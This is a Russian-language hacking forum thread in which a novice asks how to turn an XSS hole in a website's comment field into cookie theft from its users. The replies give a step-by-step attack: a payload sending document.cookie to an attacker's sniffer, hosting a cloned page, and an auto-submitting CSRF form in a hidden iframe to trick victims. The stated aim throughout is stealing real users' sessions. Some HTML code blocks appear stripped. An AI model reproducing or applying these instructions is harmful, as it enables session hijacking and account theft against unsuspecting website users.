 |
|
18.12.2012, 01:00
|
|
Участник форума
Регистрация: 09.10.2012
Сообщений: 146
С нами:
7153526
Репутация:
1
|
|
Цитата:
Сообщение от Bugatti15047
Дак как же сделать ссылку, если уязвимость была найдена не в строке поиска сайта, а в стркое комментов.
Мне мои куки, конечно, вылазят, а как мне присобачит к этому снифер, да еще сделать так, чтобы он работал на этот сайте, если весь этот скрипт пашет только в строке комментарий?
JavaScript highlight
Код:
img =
new
Image
(); img.
src
=
"адрес сниффера?"
+
document
.
cookie
;
|
|
|
18.12.2012, 01:00
|
|
Новичок
Регистрация: 18.12.2012
Сообщений: 7
С нами:
7052726
Репутация:
0
|
|
iHack3R,
Дак если я отправлю
source:
Код:
img = new Image(); img.src = "адрес сниффера?"+document.cookie;
Жертве, разве сработает? Где в скрипте строчка, что она должна работать именно на моем сайте?
|
|
|
|
19.12.2012, 01:00
|
|
Новичок
Регистрация: 18.12.2012
Сообщений: 7
С нами:
7052726
Репутация:
0
|
|
HPC'офцы =)
Помогите пожалуйста новичку
Поиск фильтрует " >", но в комментариях пропускает
source:
IMAGE http://4put.ru/pictures/max/483/1483881.jpg
Если прописывать
source:
Код:
img = new Image(); img.src = "адрес сниффера?"+document.cookie;
Все шикарно, на снифер отсылаются cookie
IMAGE http://4put.ru/pictures/max/483/1483888.jpg
Но как же реализовать такую ссылку, по которой переходя, жертва (пользователь сайта)
Отошлет мне cookie, я ведь не могу воспользоваться этим
source:
Код:
img = new Image(); img.src = "адрес сниффера?"+document.cookie;
Отправка cookies, ведь, произойдет только в том случае, если жертва сама вобьет этот скрипт в коммент?
|
|
|
|
19.12.2012, 01:00
|
|
Познавший АНТИЧАТ
Регистрация: 30.03.2010
Сообщений: 1,068
С нами:
8484086
Репутация:
335
|
|
Ну если комментарии сохраняются на сайте и если после обновления страницы с комментариями каждый раз выскакивает алерт, то это активная xss, в данном случае тебе надо только отправить в комменте скрипт для кражи кук и заманить жертву на эту страницу. Если же алерт выскакивает только единожды после отправки комментария, а после обновления страницы не выскакивает, то это пассивка, тогда надо будет писать эксплуатирующий скрипт автосабмита или что-то в этом роде. По сути жертву тоже придется заманить на страницу, только уже на свою с кодом автосабмита.
p.s. не надо заставлять жертву саму что-то вводить=) Javascript давно уже все сам делает)
|
|
|
|
19.12.2012, 01:00
|
|
Новичок
Регистрация: 18.12.2012
Сообщений: 7
С нами:
7052726
Репутация:
0
|
|
Цитата:
Сообщение от Nick Hander
Ну если комментарии сохраняются на сайте и если после обновления страницы с комментариями каждый раз выскакивает алерт, то это активная xss, в данном случае тебе надо только отправить в комменте скрипт для кражи кук и заманить жертву на эту страницу. Если же алерт выскакивает только единожды после отправки комментария, а после обновления страницы не выскакивает, то это пассивка, тогда надо будет писать эксплуатирующий скрипт автосабмита или что-то в этом роде. По сути жертву тоже придется заманить на страницу, только уже на свою с кодом автосабмита.
p.s. не надо заставлять жертву саму что-то вводить=) Javascript давно уже все сам делает)
Однозначно на сайте пассивка,
Проблема в том, что я не могу ее реализовать,
Если бы она была через поиск, я бы смог (есть пример как)
А через коммент, я понятия не имею
Нужно каким то образом составить ссылку,с этим скриптом + скриптом сниффера,
Как это реализовать, я не знаю
Не могли бы вы подсказать?
|
|
|
|
19.12.2012, 01:00
|
|
Познавший АНТИЧАТ
Регистрация: 30.03.2010
Сообщений: 1,068
С нами:
8484086
Репутация:
335
|
|
Ну один из вариантов таков - тебе надо создать свой сайт, на нем разместить страничку (любую). Затем создать вторую страничку скопировав туда код страницы уязвимого сайта с комментариями, добавив в тэг textarea в коде страницы свой текст для кражи куки и поставив автоисполнение формы при загрузке страницы в тэг body
Цитата:
Жертва зайдет на твою страницу, ничего не заметит, в это время у нее на страницы откроется твоя страница во фрейме, которая искуственно сделает эмуляцию того, что пользователь ввел сам скрипт в уязвимое поле. А куки придут тебе на сниффер.
Have fun!
|
|
|
|
19.12.2012, 01:00
|
|
Новичок
Регистрация: 18.12.2012
Сообщений: 7
С нами:
7052726
Репутация:
0
|
|
Цитата:
Сообщение от Nick Hander
Ну один из вариантов таков - тебе надо создать свой сайт, на нем разместить страничку (любую). Затем создать вторую страничку скопировав туда код страницы уязвимого сайта с комментариями, добавив в тэг textarea в коде страницы свой текст для кражи куки и поставив автоисполнение формы при загрузке страницы в тэг body
подробнее об этом почтитай в статье об CSRF (Cross Site Request Forgery). Она здесь есть. Затем на первую страницу поставь эту страницу с скрытом фрейме
Жертва зайдет на твою страницу, ничего не заметит, в это время у нее на страницы откроется твоя страница во фрейме, которая искуственно сделает эмуляцию того, что пользователь ввел сам скрипт в уязвимое поле. А куки придут тебе на сниффер.
Have fun!
Читаю, читает так легко!
Вопрос, нужен платный хостинг или сойдет любой?
И еще, не могли бы подкинуть ссылку на статью CSRF, пожалуйста
И последние, нет ли того, что вы расписали, но как то более подробно чтоли
А то видимо уровень знаний слишком низок, чтобы осознать и выполнить выше написанное без помощи
|
|
|
|
19.12.2012, 01:00
|
|
Постоянный
Регистрация: 01.03.2012
Сообщений: 620
С нами:
7473206
Репутация:
41
|
|
Цитата:
Сообщение от Bugatti15047
Читаю, читает так легко!
Вопрос, нужен платный хостинг или сойдет любой?
И еще, не могли бы подкинуть ссылку на статью CSRF, пожалуйста
И последние, нет ли того, что вы расписали, но как то более подробно чтоли
А то видимо уровень знаний слишком низок, чтобы осознать и выполнить выше написанное без помощи
Знаешь, только Nick Hander расписал тебе настолько хорошо, что даже те кто не в теме поняли=)
Да и вообще, Nick всегда хорошо пишет !(отдельное спасибо)
Постараюсь объяснить, как сам понял.
Вообщем, сделай две странички.
На первой размести скрипт формы.
Его нужно поискать на странице, например :
HTML highlight
Код:
Ваш псевдоним :
Текст комментария :
Допустим ты нашёл что-то похожее.
Теперь, вставь такой код на страницу, которую ты создал(а у нас их две =) )
HTML highlight
Код:
Ваш псевдоним :
Текст комментария :
...
И сохрани эту первую страничку с названием 1.html.
Теперь создай вторую страничку.
Там напиши это :
HTML highlight
Теперь, если ты зайдешь на вот эту вторую страницу, у тебя автоматически отправится комментарий, с кодом для кражи кукисов =) |
|
|
|
19.12.2012, 01:00
|
|
Познавший АНТИЧАТ
Регистрация: 30.03.2010
Сообщений: 1,068
С нами:
8484086
Репутация:
335
|
|
Цитата:
noizZzefan
Пасиб за комплименты и за то, что расписал подробнее=) Я именно это имел в виду.
На самом деле незнающему человеку действительно не совсем понятно будет то, что я сказал. И самостоятельно выполнить это можно будучи знакомым с сутью уязвимостей, сутью xss и csrf. Так что тут действительно нужно более подробно разъяснить.
Цитата:
Bugatti15047
В дополнение к сказанному noizZzefan'ом отвечу на вопросы, которые ты мне лично задал.
Вопрос, нужен платный хостинг или сойдет любой?
Сойдет любой, даже без поддержки php. Пойдет и юкоз. Фокус в том, что тебе надо будет заманить жертву на свою страницу, которая ему будет интересна. Можно просто с копипастить страницу, как ты предполагаешь, интересную жертве (делается, например, через teleport или сохранением страницы как html документ с изображениями через оперу), и залить ее себе на хост. В ней уже прописывать фрейм. Факт в том, что пользователя может смутить домен "ucoz.net" или что-то в этом роде. Если боишься, что пользователь начнет подозревать, то придется тогда регать домен второго уровня, например в зоне .ru. Но хостинг платный делать совсем не обязательно.
И еще, не могли бы подкинуть ссылку на статью CSRF, пожалуйста
Она в этом же форуме, закреплена в важных темах даже - XSRF (хотя правильнее называть CSRF, также как и XSS - CSS, правда css правильнее ассоциировать совсем с другим=))
|
|
|
|
19.12.2012, 01:00
|
|
Участник форума
Регистрация: 09.10.2012
Сообщений: 146
С нами:
7153526
Репутация:
1
|
|
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
